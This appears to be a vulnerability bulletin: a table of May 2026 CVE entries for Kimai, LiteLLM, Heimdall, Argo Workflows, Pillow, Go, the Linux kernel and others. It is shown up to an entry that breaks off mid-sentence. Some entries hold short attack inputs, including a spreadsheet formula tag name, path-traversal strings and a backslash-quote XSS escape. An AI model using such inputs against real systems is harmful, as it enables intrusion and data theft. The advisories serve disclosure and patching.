| kimai--kimai | Kimai is an open-source time tracking application. From version 2.27.0 to before version 2.54.0, any ROLE_USER can create a tag with a formula string as its name (e.g. =SUM(54+51)) via POST /api/tags and assign it to a timesheet. When an admin exports timesheets to XLSX, ArrayFormatter.formatValue() joins tag names with implode() and returns the result unchanged. OpenSpout promotes any =-prefixed string to a FormulaCell, writing <f>SUM(54+51)</f> into the XLSX archive. Excel evaluates the formula when the file is opened. This issue has been patched in version 2.54.0. | 2026-05-08 | not yet calculated | CVE-2026-42267 | https://github.com/kimai/kimai/security/advisories/GHSA-3xc2-h5r3-wv3r https://github.com/kimai/kimai/releases/tag/2.54.0 |
| BerriAI--litellm | LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to preview an MCP server before saving it - POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list - accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user - including holders of low-privilege internal-user keys - could therefore run arbitrary commands on the host. This issue has been patched in version 1.83.7. | 2026-05-08 | not yet calculated | CVE-2026-42271 | https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| dadrus--heimdall | Heimdall is a cloud native Identity Aware Proxy and Access Control Decision service. Prior to version 0.17.14, Heimdall handles URL-encoded slashes (%2F) in a case-sensitive manner, while percent-encoding is defined to be case-insensitive. As a result, the lowercase equivalent (%2f) is not recognized and therefore not processed as expected when allow_encoded_slashes is set to off (the default setting). This discrepancy can lead to differences in how request paths are interpreted by heimdall and upstream components, which may result in authorization bypass. This issue has been patched in version 0.17.14. | 2026-05-08 | not yet calculated | CVE-2026-42272 | https://github.com/dadrus/heimdall/security/advisories/GHSA-43jv-5j4x-qv67 https://github.com/dadrus/heimdall/pull/3207 https://github.com/dadrus/heimdall/commit/8b0de6aba23a047cfee3081df878271bb17f4351 https://github.com/dadrus/heimdall/releases/tag/v0.17.14 |
| dadrus--heimdall | Heimdall is a cloud native Identity Aware Proxy and Access Control Decision service. Prior to version 0.17.14, Heimdall performs host matching in a case-sensitive manner, while HTTP hostnames are case-insensitive. This discrepancy can result in heimdall failing to match a rule for a request host that differs only in letter casing, potentially causing the request to be classified differently than intended. This issue has been patched in version 0.17.14. | 2026-05-08 | not yet calculated | CVE-2026-42273 | https://github.com/dadrus/heimdall/security/advisories/GHSA-72h4-mxfc-jx37 https://github.com/dadrus/heimdall/pull/3208 https://github.com/dadrus/heimdall/commit/3d05e56a9e7ef0355f17482b4322054af4e85943 https://github.com/dadrus/heimdall/releases/tag/v0.17.14 |
| dadrus--heimdall | Heimdall is a cloud native Identity Aware Proxy and Access Control Decision service. Prior to version 0.17.14, Heimdall performs rule matching on the raw (non-normalized) request path, while downstream components may normalize dot-segments according to RFC 3986, Section 6.2.2.3. This discrepancy can result in heimdall authorizing a request for one path (e.g., /user/../admin, or URL-encoded variants such as /user/%2e%2e/admin or /user/%2e%2e%2fadmin. The latter would require the allow_encoded_slashes option to be set to on or no_decode.) while the downstream ultimately processes a different, normalized path (/admin). This issue has been patched in version 0.17.14. | 2026-05-08 | not yet calculated | CVE-2026-42274 | https://github.com/dadrus/heimdall/security/advisories/GHSA-3q34-rx83-r6mq https://github.com/dadrus/heimdall/pull/3209 https://github.com/dadrus/heimdall/commit/b5dfa484b7a8c2ce6d8691c026f9da867719947a https://github.com/dadrus/heimdall/releases/tag/v0.17.14 |
| UltraDAGcom--core | UltraDAG is a minimal DAG-BFT blockchain in Rust. Prior to commit fb6ef59, the UltraDAG StateEngine implementation of SmartTransferTx contains a critical logic flaw in its policy enforcement pipeline. When a transaction originates from a "Pocket" (a derived sub-address documented in the protocol as a way to organize funds), the engine fails to resolve the pocket's parent account before checking the spending policy. Because pockets are "virtual" addresses that exist only as entries in the pocket_to_parent map and do not have their own SmartAccountConfig entries, the check_spending_policy method defaults to an "authorized/no policy" result. This allow any user (or attacker in possession of a parent key) to instantly drain every pocket on an account, even if the parent account has a strict 24-hour vault delay or a 1 UDAG daily limit. This issue has been patched via commit fb6ef59. | 2026-05-08 | not yet calculated | CVE-2026-42278 | https://github.com/UltraDAGcom/core/security/advisories/GHSA-9chc-gjfr-6hrq https://github.com/UltraDAGcom/core/commit/fb6ef59d6c1385400e7acea7ae31fc6a473c3051 |
| emlog--emlog | Emlog is an open source website building system. Prior to version 2.6.11, missing CSRF protection in critical admin functions allows attackers to trick authenticated administrators into performing unauthorized actions like system registration, plugin management, and configuration changes. This issue has been patched in version 2.6.11. | 2026-05-08 | not yet calculated | CVE-2026-42286 | https://github.com/emlog/emlog/security/advisories/GHSA-cqqp-rx28-gv2q |
| emlog--emlog | Emlog is an open source website building system. Prior to version 2.6.11, direct SQL injection in article creation and update functions allows attackers to execute arbitrary SQL commands, potentially leading to complete database compromise, data theft, or system destruction. This issue has been patched in version 2.6.11. | 2026-05-08 | not yet calculated | CVE-2026-42287 | https://github.com/emlog/emlog/security/advisories/GHSA-xxj8-fc63-j3gw |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.7.14 and 4.0.5, the Webhook Interceptor loads the entire request body into memory before authenticating the request or verifying its signature. This occurs on the /api/v1/events/ endpoint, which is publicly accessible (albeit intended for webhooks). An attacker can send a request with an extremely large body (e.g., multiple gigabytes), causing the Argo Server to allocate excessive memory, potentially leading to an Out-Of-Memory (OOM) crash and denial of service. This issue has been patched in versions 3.7.14 and 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42294 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-jcc8-g2q4-9fxq https://github.com/argoproj/argo-workflows/commit/7abb4de6c3599e2d5d960ba4d5de4cf1df109965 https://github.com/argoproj/argo-workflows/releases/tag/v3.7.14 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, the workflow executor logs all artifact repository credentials (S3 access keys, secret keys, GCS service account keys, Azure account keys, Git passwords, etc.) in plaintext on artifact operation. Any user with read access to workflow pod logs can extract these credentials. This issue has been patched in version 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42295 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-7vf8-2cr6-54mf https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, the Sync Service's ConfigMap-backed provider (server/sync/sync_cm.go) performs zero authorization checks on all CRUD operations (create, read, update, delete). Any authenticated user - including those using fake Bearer tokens - can create, read, update, and delete Kubernetes ConfigMaps containing synchronization limits. This issue has been patched in version 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42297 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xchc-cqwg-g76q https://github.com/argoproj/argo-workflows/commit/09fff05e0830c14a5e36cc40597ad84881db1ab6 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| python-pillow--Pillow | Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42308 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| python-pillow--Pillow | Pillow is a Python imaging library. From version 11.2.1 to before version 12.2.0, passing nested lists as coordinates to APIs that accept coordinates such as ImagePath.Path, ImageDraw.ImageDraw.polygon and ImageDraw.ImageDraw.line could cause a heap buffer overflow, as nested lists were recursively unpacked beyond the allocated buffer. Coordinate lists are now validated to contain exactly two numeric coordinates. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42309 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2 https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| python-pillow--Pillow | Pillow is a Python imaging library. From version 4.2.0 to before version 12.2.0, an attacker can supply a malicious PDF that causes the process to hang indefinitely, consuming 100% CPU and making the application unresponsive. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42310 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7 https://github.com/python-pillow/Pillow/pull/9519 https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468 https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| python-pillow--Pillow | Pillow is a Python imaging library. From version 10.3.0 to before version 12.2.0, processing a malicious PSD file could lead to memory corruption, potentially resulting in a crash or arbitrary code execution. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42311 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-pwv6-vv43-88gr https://github.com/python-pillow/Pillow/pull/9520 https://github.com/python-pillow/Pillow/commit/58f9a1d166dcb0c274807d4423522d205b0c35ea https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| quarkiverse--quarkus-openapi-generator | Quarkus OpenAPI Generator is Quarkus' extensions for generation of Rest Clients and server stubs generation. Prior to versions 2.11.1-lts, 2.16.0-lts, and 2.17.0, the generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints. This issue has been patched in versions 2.11.1-lts, 2.16.0-lts, and 2.17.0. | 2026-05-09 | not yet calculated | CVE-2026-42333 | https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586 https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0 |
| QuantumNous--new-api | New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. In versions 0.11.9-alpha.1 and prior, the SSRF protection introduced in v0.9.0.5 (CVE-2025-59146) and hardened in v0.9.6 (CVE-2025-62155) does not block the unspecified address 0.0.0.0. A regular (non-admin) user holding any valid API token can send a multimodal request to /v1/chat/completions, /v1/responses, or /v1/messages with 0.0.0.0 as the image/file URL host, bypassing the private-IP filter and causing the server to issue HTTP requests to localhost. This constitutes at minimum a blind SSRF; when the request is routed through an AWS/Bedrock Claude adaptor, the fetched content is inlined into the model response, upgrading it to a full-read SSRF. At time of publication, there are no publicly available patches. | 2026-05-08 | not yet calculated | CVE-2026-42339 | https://github.com/QuantumNous/new-api/security/advisories/GHSA-v5c3-6wvc-pc2q |
| labring--FastGPT | FastGPT is an AI Agent building platform. In versions 4.14.13 and prior, the code-sandbox component suffers from insufficient resource isolation and uncontrolled resource consumption. The service relies solely on an application-level soft limit (a 500ms polling interval) for memory management and lacks strict OS-level constraints such as cgroups or kernel-level namespaces. This architectural weakness allows attackers to easily bypass memory checks via time-window attacks, or exhaust the entire JavaScript worker pool via concurrent CPU-intensive requests, resulting in a complete Denial of Service (DoS) for legitimate users. At time of publication, there are no publicly available patches. | 2026-05-08 | not yet calculated | CVE-2026-42343 | https://github.com/labring/FastGPT/security/advisories/GHSA-qv7v-r94x-6x3x |
| akuity--kargo | Kargo manages and automates the promotion of software artifacts. Prior to versions 1.7.10, 1.8.13, 1.9.8, and 1.10.2, Kargo is vulnerable to open redirect in UI OIDC login flow via the redirectTo query parameter. This issue has been patched in versions 1.7.10, 1.8.13, 1.9.8, and 1.10.2. | 2026-05-08 | not yet calculated | CVE-2026-42350 | https://github.com/akuity/kargo/security/advisories/GHSA-g7gw-m874-7rmf |
| Apache Software Foundation--Apache OpenNLP | OOM Denial of Service via Unbounded Array Allocation in Apache OpenNLP AbstractModelReader Versions Affected: before 2.5.9 before 3.0.0-M3 Description: The AbstractModelReader methods getOutcomes(), getOutcomePatterns(), and getPredicates() each read a 32-bit signed integer count field from a binary model stream and pass that value directly to an array allocation (new String[numOutcomes], new int[numOCTypes][], new String[NUM_PREDS]) without validating that the value is non-negative or within a reasonable bound. The count is therefore fully attacker-controlled when the model file originates from an untrusted source. A crafted .bin model file in which any of these count fields is set to Integer.MAX_VALUE (or any value large enough to exhaust the available heap) triggers an OutOfMemoryError at the array allocation itself, before the corresponding label or pattern data is consumed from the stream. The error occurs very early in deserialization: for a GIS model, getOutcomes() is reached after only the model-type string, the correction constant, and the correction parameter have been read; so the attacker pays no meaningful size cost to weaponize a payload, and a single small file can crash a JVM that loads it. Any code path that deserializes a .bin model is affected, including direct use of GenericModelReader and any higher-level component that delegates to it during model load. The practical impact is denial of service against processes that load model files from untrusted or semi-trusted origins. Mitigation: * 2.x users should upgrade to 2.5.9. * 3.x users should upgrade to 3.0.0-M3. Note: The fix introduces an upper bound on each of the three count fields, checked before array allocation; counts that are negative or exceed the bound cause an IllegalArgumentException to be thrown and the read to fail fast with no large allocation. The default bound is 10,000,000, which is well above the entry counts of legitimate OpenNLP models but far below any value that would threaten heap exhaustion. Deployments that legitimately need to load models with more entries than the default can raise the limit at JVM startup by setting the OPENNLP_MAX_ENTRIES system property to the desired positive integer (e.g. -DOPENNLP_MAX_ENTRIES=50000000); invalid or non-positive values fall back to the default. Users who cannot upgrade immediately should treat all .bin model files as untrusted input unless their provenance is verified, and should avoid loading models supplied by end users or fetched from third-party repositories without integrity checks. | 2026-05-04 | not yet calculated | CVE-2026-42440 | https://lists.apache.org/thread/s8xlkx1gqbxfsq48py5h6jphjvgqp1jo |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, the extractArchive and compressFiles endpoints in file-manager.ts use double-quoted strings for shell command construction, unlike all other file manager operations which use single-quote escaping. Double quotes allow $(command) substitution, enabling command injection on the remote SSH host. This issue has been patched in version 2.1.0. | 2026-05-08 | not yet calculated | CVE-2026-42453 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-rvg4-7vvq-9c2w https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag |
| linkwarden--linkwarden | Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In versions 2.14.0 and prior, the archive upload endpoint (POST /api/v1/archives/[linkId]?format=4) accepts HTML files (text/html) without sanitizing JavaScript content. When the archive is later accessed via GET /api/v1/archives/[linkId]?format=4, the HTML is served with Content-Type: text/html from the Linkwarden origin, without any Content-Security-Policy header. This allows arbitrary JavaScript execution in the context of the authenticated Linkwarden sessio. At time of publication, there are no publicly available patches. | 2026-05-08 | not yet calculated | CVE-2026-42455 | https://github.com/linkwarden/linkwarden/security/advisories/GHSA-fjvg-mch3-j3vg |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to version 1.18.0, four GET endpoints under /api/templates* in Arcane's Huma backend are registered without any Security requirement, allowing any unauthenticated network client to list and read the full Compose YAML and .env content of every custom template stored in the instance. Because Arcane's UI exposes a "Save as Template" flow on the project / swarm-stack creation pages that persists the operator's real env content (database passwords, API keys, etc.) verbatim, this missing authorization is an unauthenticated read of operator secrets in practice - not a theoretical info-disclosure. The frontend explicitly treats /customize/templates/* as an authenticated area (PROTECTED_PREFIXES in frontend/src/lib/utils/redirect.util.ts), and every CRUD operation (POST/PUT/DELETE) on the same paths requires a Bearer/API key, so this is a clear backend authorization gap, not intended public access. This issue has been patched in version 1.18.0. | 2026-05-09 | not yet calculated | CVE-2026-42461 | https://github.com/getarcaneapp/arcane/security/advisories/GHSA-cxx3-hr75-4q96 https://github.com/getarcaneapp/arcane/releases/tag/v1.18.0 |
| Go standard library--net/mail | Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322. | 2026-05-07 | not yet calculated | CVE-2026-42499 | https://go.dev/issue/78987 https://go.dev/cl/771520 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4977 |
| Go toolchain--cmd/go | A malicious module proxy can exploit a flaw in the go command's validation of module checksums to bypass checksum database validation. This vulnerability affects any user using an untrusted module proxy (GOMODPROXY) or checksum database (GOSUMDB). A malicious module proxy can serve altered versions of the Go toolchain. When selecting a different version of the Go toolchain than the currently installed toolchain (due to the GOTOOLCHAIN environment variable, or a go.work or go.mod with a toolchain line), the go command will download and execute a toolchain provided by the module proxy. A malicious module proxy can bypass checksum database validation for this downloaded toolchain. Since this vulnerability affects the security of toolchain downloads, setting GOTOOLCHAIN to a fixed version is not sufficient. You must upgrade your base Go toolchain. The go tool always validates the hash of a toolchain before executing it, so fixed versions will refuse to execute any cached, altered versions of the toolchain. The go tool trusts go.sum files to contain accurate hashes of the current module's dependencies. A malicious proxy exploiting this vulnerability to serve an altered module will have caused an incorrect hash to be recorded in the go.sum. Users who have configured a non-trusted GOPROXY can determine if they have been affected by running "rm go.sum ; go mod tidy ; go mod verify", which will revalidate all dependencies of the current module. The specific flaw in more detail: The go command consults the checksum database to validate downloaded modules, when a module is not listed in the go.sum file. It verifies that the module hash reported by the checksum database matches the hash of the downloaded module. If, however, the checksum database returns a successful response that contains no entry for the module, the go command incorrectly permitted validation to succeed. A module proxy may mirror or proxy the checksum database, in which case the go command will not connect to the checksum database directly. Checksums reported by the checksum database are cryptographically signed, so a malicious proxy cannot alter the reported checksum for a module. However, a proxy which returns an empty checksum response, or a checksum response for an unrelated module, could cause the go command to proceed as if a downloaded module has been validated. | 2026-05-07 | not yet calculated | CVE-2026-42501 | https://go.dev/cl/775321 https://go.dev/issue/79070 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4984 |
| golang.org/x/tools--golang.org/x/tools/gopls | gopls by default communicates via pipe. However, -port and -listen flags are supported as means of debugging. If -listen is given a value without an explicit host (e.g. :8080), or -port is used, gopls will listen on 0.0.0.0. As a result, users might inadvertently cause gopls to bind 0.0.0.0. This can allow a malicious party on the same network to execute code arbitrarily via gopls. | 2026-05-06 | not yet calculated | CVE-2026-42503 | https://go.dev/issue/79211 https://go.dev/cl/774381 |
| Apache Software Foundation--Apache Wicket | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-42509 | https://lists.apache.org/thread/52nrq4tt07gxz4r6sj5gyocz5s6bprjp |
| PelicanPlatform--pelican | Pelican is a platform for creating data federations. From versions 7.21.0 to before 7.21.5, 7.22.0 to before 7.22.3, 7.23.0 to before 7.23.3, and 7.24.0 to before 7.24.2, there is a a privilege escalation vulnerability affecting Pelican's Web User Interface (WebUI). This attack allows any user authenticated to the WebUI via OAuth to gain admin privileges under certain configurations. This issue has been patched in versions 7.21.5, 7.22.3, 7.23.3, and 7.24.2. | 2026-05-09 | not yet calculated | CVE-2026-42571 | https://github.com/PelicanPlatform/pelican/security/advisories/GHSA-rpfr-x88x-xwcw https://github.com/PelicanPlatform/pelican/commit/7f73b9c3e677a0ae4a0ec465c5d98bb8bd948854 |
| ArchiveBox--ArchiveBox | ArchiveBox is an open source self-hosted web archiving system. In versions 0.8.6rc0 and prior, the /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE. At time of publication, there are no publicly available patches. | 2026-05-09 | not yet calculated | CVE-2026-42601 | https://github.com/ArchiveBox/ArchiveBox/security/advisories/GHSA-3h23-7824-pj8r |
| absinthe-graphql--absinthe | Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL. Multiple Blueprint.Draft.convert/2 implementations in Absinthe's SDL language modules call String.to_atom/1 on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with system_limit and taking down the entire node. Any application that passes attacker-controlled GraphQL SDL through Absinthe's parser is exposed - for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents. This issue affects absinthe: from 1.5.0 before 1.10.2. | 2026-05-08 | not yet calculated | CVE-2026-42793 | https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7 https://cna.erlef.org/cves/CVE-2026-42793.html https://osv.dev/vulnerability/EEF-CVE-2026-42793 https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838 |
| absinthe-graphql--absinthe_plug | Improper Neutralization of Input During Web Page Generation (XSS) vulnerability in absinthe-graphql absinthe_plug allows reflected cross-site scripting via the GraphiQL interface. 'Elixir.Absinthe.Plug.GraphiQL':js_escape/1 in lib/absinthe/plug/graphiql.ex escapes single quotes and newlines in the query GET parameter before embedding it in an inline JavaScript string, but does not escape backslashes. An attacker can bypass the escaping by prefixing a quote with a backslash (e.g. \'), breaking out of the string context and executing arbitrary JavaScript in the victim's browser. This issue affects absinthe_plug: from 1.2.0. | 2026-05-08 | not yet calculated | CVE-2026-42794 | https://github.com/absinthe-graphql/absinthe_plug/issues/275 https://cna.erlef.org/cves/CVE-2026-42794.html https://osv.dev/vulnerability/EEF-CVE-2026-42794 https://github.com/absinthe-graphql/absinthe_plug/commit/23a0d5658d32420086711adf4ce8f05febb09963 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: Fix list corruption and UAF in command complete handlers Commit 302a1f674c00 ("Bluetooth: MGMT: Fix possible UAFs") introduced mgmt_pending_valid(), which not only validates the pending command but also unlinks it from the pending list if it is valid. This change in semantics requires updates to several completion handlers to avoid list corruption and memory safety issues. This patch addresses two left-over issues from the aforementioned rework: 1. In mgmt_add_adv_patterns_monitor_complete(), mgmt_pending_remove() is replaced with mgmt_pending_free() in the success path. Since mgmt_pending_valid() already unlinks the command at the beginning of the function, calling mgmt_pending_remove() leads to a double list_del() and subsequent list corruption/kernel panic. 2. In set_mesh_complete(), the use of mgmt_pending_foreach() in the error path is removed. Since the current command is already unlinked by mgmt_pending_valid(), this foreach loop would incorrectly target other pending mesh commands, potentially freeing them while they are still being processed concurrently (leading to UAFs). The redundant mgmt_cmd_status() is also simplified to use cmd->opcode directly. | 2026-05-05 | not yet calculated | CVE-2026-43059 | https://git.kernel.org/stable/c/695b45b2262fcb5e71bed1175aad59c72f92aa78 https://git.kernel.org/stable/c/b5c5e96f3b0a5003c3ff98ebb33e59afec51dd77 https://git.kernel.org/stable/c/02023ff760cc104a5d86a82ef5b8dd89098ad78d https://git.kernel.org/stable/c/17f89341cb4281d1da0e2fb0de5406ab7c4e25ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: 8250: Fix TX deadlock when using DMA `dmaengine_terminate_async` does not guarantee that the `__dma_tx_complete` callback will run. The callback is currently the only place where `dma->tx_running` gets cleared. If the transaction is canceled and the callback never runs, then `dma->tx_running` will never get cleared and we will never schedule new TX DMA transactions again. This change makes it so we clear `dma->tx_running` after we terminate the DMA transaction. This is "safe" because `serial8250_tx_dma_flush` is holding the UART port lock. The first thing the callback does is also grab the UART port lock, so access to `dma->tx_running` is serialized. | 2026-05-05 | not yet calculated | CVE-2026-43061 | https://git.kernel.org/stable/c/8190f9ab6ad90cb97652adbebd238b874a4ef70d https://git.kernel.org/stable/c/79a19bd936bb35f56ef0ccab1b3b59ebce8c762d https://git.kernel.org/stable/c/f76d91271bcacbd759a2e4ee3ea61faa6a727ccf https://git.kernel.org/stable/c/d2719a0a9c3439abf67843a5504b7afccd9ded93 https://git.kernel.org/stable/c/2a72403b985aea6b4aac3171830492f9a387f9e1 https://git.kernel.org/stable/c/5f6b17562f03fc65c7d3474ef8f1959b19d1ca41 https://git.kernel.org/stable/c/b5ad887339503103d0fbe9827b16ad287597c275 https://git.kernel.org/stable/c/a424a34b8faddf97b5af41689087e7a230f79ba7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: Fix not releasing workqueue on .release() The workqueue associated with an DSA/IAA device is not released when the object is freed. | 2026-05-05 | not yet calculated | CVE-2026-43064 | https://git.kernel.org/stable/c/fd4cb61bbd0fc3a749a8da6145cbb56d8f6dba35 https://git.kernel.org/stable/c/2bb9e9e93adff9cc8a138ae9a3a8d59b3452272e https://git.kernel.org/stable/c/d02c24af126dee45247dc7890409c86d1831859d https://git.kernel.org/stable/c/958e96533ddbd1edd127feb7624a7eed0cc379dc https://git.kernel.org/stable/c/fc34f199eb576b3a73089452fdf0056cc9a9301d https://git.kernel.org/stable/c/3d33de353b1ff9023d5ec73b9becf80ea87af695 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: always drain queued discard work in ext4_mb_release() While reviewing recent ext4 patch[1], Sashiko raised the following concern[2]: > If the filesystem is initially mounted with the discard option, > deleting files will populate sbi->s_discard_list and queue > s_discard_work. If it is then remounted with nodiscard, the > EXT4_MOUNT_DISCARD flag is cleared, but the pending s_discard_work is > neither cancelled nor flushed. [1] https://lore.kernel.org/r/20260319094545.19291-1-qiang.zhang@linux.dev/ [2] https://sashiko.dev/#/patchset/20260319094545.19291-1-qiang.zhang%40linux.dev The concern was valid, but it had nothing to do with the patch[1]. One of the problems with Sashiko in its current (early) form is that it will detect pre-existing issues and report it as a problem with the patch that it is reviewing. In practice, it would be hard to hit deliberately (unless you are a malicious syzkaller fuzzer), since it would involve mounting the file system with -o discard, and then deleting a large number of files, remounting the file system with -o nodiscard, and then immediately unmounting the file system before the queued discard work has a change to drain on its own. Fix it because it's a real bug, and to avoid Sashiko from raising this concern when analyzing future patches to mballoc.c. | 2026-05-05 | not yet calculated | CVE-2026-43065 | https://git.kernel.org/stable/c/e96c2354b170aaa53300c8e8fd59e41b133160f7 https://git.kernel.org/stable/c/c360e9d0def4f4ae03254a67c683103908555b75 https://git.kernel.org/stable/c/1c82f863f090ab899085bdfade073313384b514b https://git.kernel.org/stable/c/9b4d9dda6a71ad3425c8109d27c4c6bfb9da97b8 https://git.kernel.org/stable/c/812b6a7cd3e7f3a3e8a24db85bc6313c26cb1098 https://git.kernel.org/stable/c/b4737e26d4688b8aea88ad6ea4dbfeb6e78b0327 https://git.kernel.org/stable/c/9ee29d20aab228adfb02ca93f87fb53c56c2f3af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix iloc.bh leak in ext4_fc_replay_inode() error paths During code review, Joseph found that ext4_fc_replay_inode() calls ext4_get_fc_inode_loc() to get the inode location, which holds a reference to iloc.bh that must be released via brelse(). However, several error paths jump to the 'out' label without releasing iloc.bh: - ext4_handle_dirty_metadata() failure - sync_dirty_buffer() failure - ext4_mark_inode_used() failure - ext4_iget() failure Fix this by introducing an 'out_brelse' label placed just before the existing 'out' label to ensure iloc.bh is always released. Additionally, make ext4_fc_replay_inode() propagate errors properly instead of always returning 0. | 2026-05-05 | not yet calculated | CVE-2026-43066 | https://git.kernel.org/stable/c/0892f12cd49fde5d5db68137923db107f894f3a3 https://git.kernel.org/stable/c/5a63033696e60b5d70816f1d119645ac5b0b0a03 https://git.kernel.org/stable/c/9c90449a9ac2cd1ba540ad2561b8b70c1bfb0a25 https://git.kernel.org/stable/c/ca99cbcc316cdfd2040cc2b13d1426ccb3b3b50b https://git.kernel.org/stable/c/19782b4c793b49a6aa4abbb307ddff3610009d21 https://git.kernel.org/stable/c/f7817ad399d604e8639005d87d148b5ec626ad26 https://git.kernel.org/stable/c/c426231e3d51916e83b6d1ab7ed8a65e83bca5b4 https://git.kernel.org/stable/c/ec0a7500d8eace5b4f305fa0c594dd148f0e8d29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: avoid allocate block from corrupted group in ext4_mb_find_by_goal() There's issue as follows: ... EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 2243 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 2239 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): error count since last fsck: 1 EXT4-fs (mmcblk0p1): initial error at time 1765597433: ext4_mb_generate_buddy:760 EXT4-fs (mmcblk0p1): last error at time 1765597433: ext4_mb_generate_buddy:760 ... According to the log analysis, blocks are always requested from the corrupted block group. This may happen as 